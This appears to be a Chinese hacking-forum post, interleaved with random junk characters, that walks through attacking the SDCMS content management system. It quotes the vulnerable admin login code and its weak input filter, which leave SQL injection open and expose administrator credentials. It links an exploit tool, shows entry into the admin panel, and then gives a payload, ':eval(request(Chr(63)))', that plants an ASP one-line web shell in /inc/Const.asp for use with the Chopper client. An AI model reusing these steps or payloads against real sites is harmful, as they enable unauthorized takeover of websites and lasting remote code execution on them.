作者:T00LS 鬼哥% n4 D/ Z$ q" R3 u
漏洞文件:后台目录/index.asp
1 _3 d( G0 e! [$ |- n' N( t
4 N, x+ A% e* q+ ?6 C5 cSub Check
3 h6 t% c5 `+ W0 M Dim username,password,code,getcode,Rs% D5 r& c2 k& Z+ g+ Q
IF Check_post Then Echo "1禁止从外部提交数据!":Exit Sub- c. G; Q- p* I3 [* l6 ] s
username=FilterText(Trim(Request.Form("username")),1)/ M- O6 ?; r, p* F- u7 l; }# R
password=FilterText(Trim(Request.Form("password")),1)
2 }) ^" ]8 L; N* q. |6 y# D2 b/ n code=Trim(Request.Form("yzm"))
* I( g% K! I. E# @% o7 @ getcode=Session("SDCMSCode")
5 a# H- x1 g7 C" ]8 z9 a IF errnum>=loginnum Then Echo "系统已禁止您今日再登录":died
# M: [+ d- K, z0 D- z IF code="" Then Alert "验证码不能为空!","javascript:history.go(-1)" ied+ I( w9 L4 g: y) p$ E( U
IF code<>"" And Not Isnumeric(code) Then Alert "验证码必须为数字!","javascript:history.go(-1)" ied
& k% Z/ V [9 Q# F0 d5 h& N% A0 S IF code<>getcode Then Alert "验证码错误!","javascript:history.go(-1)" ied1 K5 W5 I& T* F* T7 l! k" j6 O- d
IF username="" or password="" Then2 [4 }) G: S* ]8 W' O
Echo "用户名或密码不能为空" ied
/ s8 p* U+ O% J' m' d Else( ^# G- z2 N9 P6 \) z6 D
Set Rs=Conn.Execute("Select Id,Sdcms_Name,Sdcms_Pwd,isadmin,alllever,infolever From Sd_Admin Where Sdcms_name='"&username&"' And Sdcms_Pwd='"&md5(password)&"'")$ W3 u- \" X3 a4 A2 F6 L
IF Rs.Eof Then1 S* R) |6 ], h0 F( u: W
AddLog username,GetIp,"登录失败",1* i4 i3 Q7 g. S
Echo "用户名或密码错误,今日还有 "&loginnum-errnum&" 次机会"5 y/ n3 ]3 t) y8 n% E/ R
Else8 a1 \5 [% B* Q4 Q
Add_Cookies "sdcms_id",Rs(0)
, t( I) h) \" m" e/ e0 K$ s Add_Cookies "sdcms_name",username$ d# _" D0 a* k/ c: W
Add_Cookies "sdcms_pwd",Rs(2)
8 H* t% c. _) g. G8 h$ _ Add_Cookies "sdcms_admin",Rs(3)2 _- k$ B! e) D2 S
Add_Cookies "sdcms_alllever",Rs(4)$ W% Y6 |6 N! C& E- V; i7 c
Add_Cookies "sdcms_infolever",Rs(5)
- j7 d" m+ Z: G0 r6 x2 i Conn.Execute("Update Sd_Admin Set logintimes=logintimes+1,LastIp='"&GetIp&"' Where id="&Rs(0)&"")) I8 K K8 ? ~# o2 e+ W
AddLog username,GetIp,"登录成功",1+ C/ p! q0 d* i1 F. J
'自动删除30天前的Log记录0 N6 l5 }: O3 `! j
IF Sdcms_DataType Then
+ D' E/ ?( H, J' G1 o' T, l( H, ? Conn.Execute("Delete From Sd_Log Where DateDiff('d',adddate,Now())>30")
+ |( H A! L9 Y$ z Else
' l) s7 Y9 B4 k) @% Z- B5 w Q' h Conn.Execute("Delete From Sd_Log Where DateDiff(d,adddate,GetDate())>30")
, @+ p% Y! ?' q3 _1 D2 ? End IF' a; D7 G& F4 a9 a5 _( F! R
Go("sdcms_index.asp")9 K, t3 Z a. P" t" `
End IF/ P3 k) l8 o; G% z- S$ \5 d7 L
Rs.Close
: {( x- H# f: ~ e! N% A$ z R Set Rs=Nothing; G, Z; I. V% R9 T' j. E
End IF) M# m- X8 S% c: t- p2 a/ S
End Sub0 @ E2 N6 l7 S' h% A- s" k
2 Y. M3 {& S ^! u6 p3 f/ |6 g’我们可以看到username是通过FilterText来过滤的。我们看看FilterText的代码: j" h0 S6 V1 K2 w) \
: f0 A' D+ v$ K t( `! d7 nFunction FilterText(ByVal t0,ByVal t1)( ]" X3 w* L1 c
IF Len(t0)=0 Or IsNull(t0) Or IsArray(t0) Then FilterText="":Exit Function
, x* X$ u+ U: M' x! n5 x, w" E; [* h t0=Trim(t0)2 v1 v B# d* n
Select Case t1
/ K6 [3 ~7 R: A7 T/ S Case "1"
6 b6 c9 x- Z! E& g/ G( j t0=Replace(t0,Chr(32),""). v& i: E! b& [, V$ u
t0=Replace(t0,Chr(13),"")/ F, }3 X# s; d* y- u. ~8 T
t0=Replace(t0,Chr(10)&Chr(10),"")8 P4 u; g: ] h. x
t0=Replace(t0,Chr(10),"")& t+ e% U, s" ?2 ~
Case "2"
) I& d8 R/ U4 y2 H t0=Replace(t0,Chr(8),"")'回格 Z( H" ~! p# k2 p
t0=Replace(t0,Chr(9),"")'tab(水平制表符)
; e# _: k3 ?3 r+ b4 X t0=Replace(t0,Chr(10),"")'换行$ ]: t+ d/ ~+ Q2 W2 o9 Y
t0=Replace(t0,Chr(11),"")'tab(垂直制表符)
3 I) h) h- d- I# u t0=Replace(t0,Chr(12),"")'换页
6 B- O" U" i8 H, A" J$ v t0=Replace(t0,Chr(13),"")'回车 chr(13)&chr(10) 回车和换行的组合
. c9 M. t$ {3 C" K1 e' {" G t0=Replace(t0,Chr(22),"")
/ A' o/ x- Q- { { h, P. ^ t0=Replace(t0,Chr(32),"")'空格 SPACE
1 ^' m4 c* C. L1 e% o) S. F8 | t0=Replace(t0,Chr(33),"")'!/ ^) ?4 L) L9 Y) f
t0=Replace(t0,Chr(34),"")'"& x9 E- V$ B x& c, w# B( l1 G
t0=Replace(t0,Chr(35),"")'#% \/ B# Z. g6 s" v4 z, H" {
t0=Replace(t0,Chr(36),"")'$
/ S- y( P1 G+ o2 w t0=Replace(t0,Chr(37),"")'%
% L& v1 h8 Y o$ k t0=Replace(t0,Chr(38),"")'&
7 M2 Q6 @0 Y/ C+ M5 H+ P+ c' o t0=Replace(t0,Chr(39),"")''
) v7 A+ O S: b t0=Replace(t0,Chr(40),"")'(
& t8 ~. Q F7 y/ Z5 {/ ~6 H U& e8 A t0=Replace(t0,Chr(41),"")')2 e- C" A; j. \' l! A) g: t
t0=Replace(t0,Chr(42),"")'*
$ c" a3 x2 A* B3 x- t' K t0=Replace(t0,Chr(43),"")'+7 P4 |) {/ u9 X6 q( ^0 r2 P
t0=Replace(t0,Chr(44),"")',
; c6 N+ O7 `' g- n! j8 v) p& s t0=Replace(t0,Chr(45),"")'-
2 V0 t9 y% S* \! U/ J! T t0=Replace(t0,Chr(46),"")'." b# V) [& i. N
t0=Replace(t0,Chr(47),"")'/
8 q1 ~, i, s7 E& G- _% S+ J# M t0=Replace(t0,Chr(58),"")':, I) g$ c( S3 `- R6 k1 m9 y. ]9 l
t0=Replace(t0,Chr(59),"")';
( ~9 |9 ^4 x0 ~, f t0=Replace(t0,Chr(60),"")'< t0=Replace(t0,Chr(61),"")'= t0=Replace(t0,Chr(62),"")'>! W1 d7 N" v( m; h6 i* R
t0=Replace(t0,Chr(63),"")'?
- b( B, E/ N( T- o8 C t0=Replace(t0,Chr(64),"")'@
1 c, J- i* ?- B+ j$ s t0=Replace(t0,Chr(91),"")'\
, Q: s% C: l2 f/ n% k t0=Replace(t0,Chr(92),"")'\ k$ k) n/ K8 I5 ?
t0=Replace(t0,Chr(93),"")']
7 E' l* g; |8 U; u9 G' u t0=Replace(t0,Chr(94),"")'^
9 f d$ E7 W) c" E t0=Replace(t0,Chr(95),"")'_5 [+ ]! W2 `$ Q5 q- T
t0=Replace(t0,Chr(96),"")'`
- a2 {% c; G, M" Y t0=Replace(t0,Chr(123),"")'{
/ ^2 m Z. {. S- n t0=Replace(t0,Chr(124),"")'|
' K' x7 ]' P# R+ T. i t0=Replace(t0,Chr(125),"")'}. H. X% N3 [' a8 Q4 F! J
t0=Replace(t0,Chr(126),"")'~9 g/ k! H2 O. m5 T7 _
Case Else# o2 D: M- n- {
t0=Replace(t0, "&", "&")- |' H& Y( \/ y; y0 G! |0 C0 f
t0=Replace(t0, "'", "'")
( t& E. b3 Y- p' y3 q t0=Replace(t0, """", """)
9 O7 K7 t' k9 o$ s t0=Replace(t0, "<", "<") t0=Replace(t0, ">", ">")
6 e* r6 L' d7 s( q- S End Select
" B4 T# e/ `1 H IF Instr(Lcase(t0),"expression")>0 Then
# k5 m* V+ `$ P4 z t0=Replace(t0,"expression","e­xpression", 1, -1, 0)
4 V" j4 `; v7 a) T' x End If% O7 C* e( M3 ?, j: \8 G$ Z* {
FilterText=t0
$ U) t% i( L$ hEnd Function
3 z1 D7 y7 c I) M! J1 d' X0 x8 b' |. }" e" n
看到没。直接参数是1 只过滤, i4 [9 ^) l% I& }
t0=Replace(t0,Chr(32)," ")* q& g$ }( ?& E5 V: [! S7 @' N- H
t0=Replace(t0,Chr(13),"")
* H4 l t) c1 E0 r6 D7 ]* | t0=Replace(t0,Chr(10)&Chr(10),"
0 w6 ]; T- v9 C")
! E! e. N0 m) l. D t0=Replace(t0,Chr(10),"
1 Y) \0 Z9 l/ M& O, D1 K$ w q")' f: W; S. r5 t" v% Q: U# B' I; v
漏洞导致可以直接拿到后台帐号密码。SDCMS默认后台地址/admin/如果站长改了后台路径,那么请自行查找!: H0 D+ p/ j) m( |4 p) ?, N% ~
EXP利用工具下载 (此工具只能在XP上运行):sdcms-EXP. i* N: U% O9 v- I* L( X
; x# B8 J/ A1 [$ s/ r6 C: ]6 P- X测试:/ I" @, n( g# }2 A) Y+ B- G
" o3 ^# p( G3 P1 [) Y. v& b3 a
+ T" D' X% c% S, d. b- z现在输入工具上验证码,然后点OK
+ Y) G. d7 t1 [, y
4 F, A3 w, V9 q0 k, U1 B
( e; ~& z ^1 u8 }0 B8 R看到我们直接进入后台管理界面了,呵呵!
" s; V$ j# H. ]% {+ `9 v' F/ Z9 z
1 m y) |$ H1 \' z- |
9 s& k* M% Q" K c, S5 \- t/ u8 m) b( L- ^4 i8 C! E' t
这样直接进入后台了。。。。% j5 O" D- {# _
* z. v( D; Y( w8 X8 T' F( I9 q
; U6 I& J/ G) {+ s
+ n1 W6 c' \3 n0 g, s. d- ]) }0 ]SDCMS提权:
5 S1 z% x# b4 {7 m
) j2 U6 l: C+ \' j方法1:访问:/后台目录/sdcms_set.asp 在 网站名称:后面加个 “:eval(request(Chr(63)))’ 即可,直接写一句话进去。 写入到/inc/Const.asp 一句话连接密码是?& \: ^9 _- q% V( V. h8 ~! v/ \
' K; M) ]! G) d4 k% S
: s- L3 S) F0 r3 f% p% p% g( q0 i$ @. L% W. M! I
OK,现在用菜刀连接下!
' O/ H( X! L2 _1 N/ M) y' q0 N: ^% U0 t
$ }6 g: y! p" o8 Z
2 G% g* {5 V$ b9 B5 p3 I
( m# ]; ~$ |. ]$ c7 z. A# [. e1 J$ `# v# E0 f& f @) r/ U2 u* u
|